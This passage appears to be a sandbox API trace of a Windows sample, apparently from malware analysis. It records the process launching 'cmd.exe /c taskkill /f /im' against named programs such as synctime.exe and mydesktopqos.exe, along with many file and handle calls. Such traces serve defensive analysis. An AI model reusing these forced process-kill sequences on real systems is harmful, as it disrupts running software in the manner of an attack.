lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im synctime.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x130, hThread=0x158, dwProcessId=0x1018, dwThreadId=0xb58)) returned 1 [0159.521] SetEvent (hEvent=0x150) returned 1 [0159.521] CloseHandle (hObject=0x158) returned 1 [0159.521] CloseHandle (hObject=0x154) returned 1 [0159.521] CloseHandle (hObject=0x144) returned 1 [0159.521] CloseHandle (hObject=0x140) returned 1 [0159.521] CloseHandle (hObject=0x13c) returned 1 [0159.521] CloseHandle (hObject=0x138) returned 1 [0159.521] CloseHandle (hObject=0x134) returned 1 [0159.521] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0xffffffff) returned 0x0 [0161.831] SetEvent (hEvent=0x150) returned 1 [0161.832] GetExitCodeProcess (in: hProcess=0x130, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0161.833] GetProcessTimes (in: hProcess=0x130, lpCreationTime=0x1242a840, lpExitTime=0x1242a848, lpKernelTime=0x1242a850, lpUserTime=0x1242a858 | out: lpCreationTime=0x1242a840, lpExitTime=0x1242a848, lpKernelTime=0x1242a850, lpUserTime=0x1242a858) returned 1 [0161.833] CloseHandle (hObject=0x130) returned 1 [0161.834] SetEvent (hEvent=0x128) returned 1 [0161.834] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0161.841] SetEvent (hEvent=0x128) returned 1 [0161.842] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123baea0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0161.843] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1a98 | out: lpFileInformation=0x123b1a98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.844] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.844] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123b1ae8 | out: lpFileInformation=0x123b1ae8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.844] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.844] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1b38 | out: lpFileInformation=0x123b1b38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.844] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.845] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123b1b88 | out: lpFileInformation=0x123b1b88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.845] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.845] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123b1bd8 | out: lpFileInformation=0x123b1bd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.845] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.845] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123b1c28 | out: lpFileInformation=0x123b1c28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.845] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.845] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123b1c78 | out: lpFileInformation=0x123b1c78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.881] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.882] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123b1cc8 | out: lpFileInformation=0x123b1cc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.882] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.882] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123b1d18 | out: lpFileInformation=0x123b1d18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.882] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.882] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123b1d68 | out: lpFileInformation=0x123b1d68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.883] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.883] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123b1db8 | out: lpFileInformation=0x123b1db8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.883] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.883] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123b1e08 | out: lpFileInformation=0x123b1e08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0161.883] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0161.883] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123baf70, nSize=0x64 | out: lpBuffer="") returned 0x63 [0161.884] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1e58 | out: lpFileInformation=0x123b1e58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0161.884] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bb040, nSize=0x64 | out: lpBuffer="") returned 0x35 [0161.884] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1ea8 | out: lpFileInformation=0x123b1ea8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0161.884] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0161.885] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0161.885] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0161.885] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0161.885] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.885] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0161.885] GetEnvironmentStringsW () returned 0x8ea900* [0161.886] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0161.887] GetCurrentProcess () returned 0xffffffff [0161.887] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12393e20, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12393e20*=0x13c) returned 1 [0161.887] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12393e24, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12393e24*=0x140) returned 1 [0161.887] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12393e28, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12393e28*=0x144) returned 1 [0161.887] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im mydesktopqos.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x1243c000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im mydesktopqos.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x158, hThread=0x154, dwProcessId=0x54c, dwThreadId=0x304)) returned 1 [0161.944] CloseHandle (hObject=0x154) returned 1 [0161.944] CloseHandle (hObject=0x144) returned 1 [0161.944] CloseHandle (hObject=0x140) returned 1 [0161.944] CloseHandle (hObject=0x13c) returned 1 [0161.944] CloseHandle (hObject=0x130) returned 1 [0161.944] CloseHandle (hObject=0x134) returned 1 [0161.944] CloseHandle (hObject=0x138) returned 1 [0161.944] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0xffffffff) returned 0x0 [0165.898] SetEvent (hEvent=0x150) returned 1 [0165.898] GetExitCodeProcess (in: hProcess=0x158, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0165.899] GetProcessTimes (in: hProcess=0x158, lpCreationTime=0x12422ec0, lpExitTime=0x12422ec8, lpKernelTime=0x12422ed0, lpUserTime=0x12422ed8 | out: lpCreationTime=0x12422ec0, lpExitTime=0x12422ec8, lpKernelTime=0x12422ed0, lpUserTime=0x12422ed8) returned 1 [0165.899] CloseHandle (hObject=0x158) returned 1 [0165.900] SetEvent (hEvent=0x128) returned 1 [0165.900] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0165.909] SetEvent (hEvent=0x128) returned 1 [0165.909] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8ea0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0165.910] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1a48 | out: lpFileInformation=0x123f1a48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.911] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.911] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123f1a98 | out: lpFileInformation=0x123f1a98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.911] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.911] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1ae8 | out: lpFileInformation=0x123f1ae8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.912] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.912] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123f1b38 | out: lpFileInformation=0x123f1b38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.912] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.912] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123f1b88 | out: lpFileInformation=0x123f1b88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.912] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.913] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123f1bd8 | out: lpFileInformation=0x123f1bd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.913] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.913] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123f1c28 | out: lpFileInformation=0x123f1c28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.913] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.913] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123f1c78 | out: lpFileInformation=0x123f1c78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.913] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.913] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123f1cc8 | out: lpFileInformation=0x123f1cc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.913] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.913] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123f1d18 | out: lpFileInformation=0x123f1d18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.914] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.914] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123f1d68 | out: lpFileInformation=0x123f1d68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.914] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.914] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123f1db8 | out: lpFileInformation=0x123f1db8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, 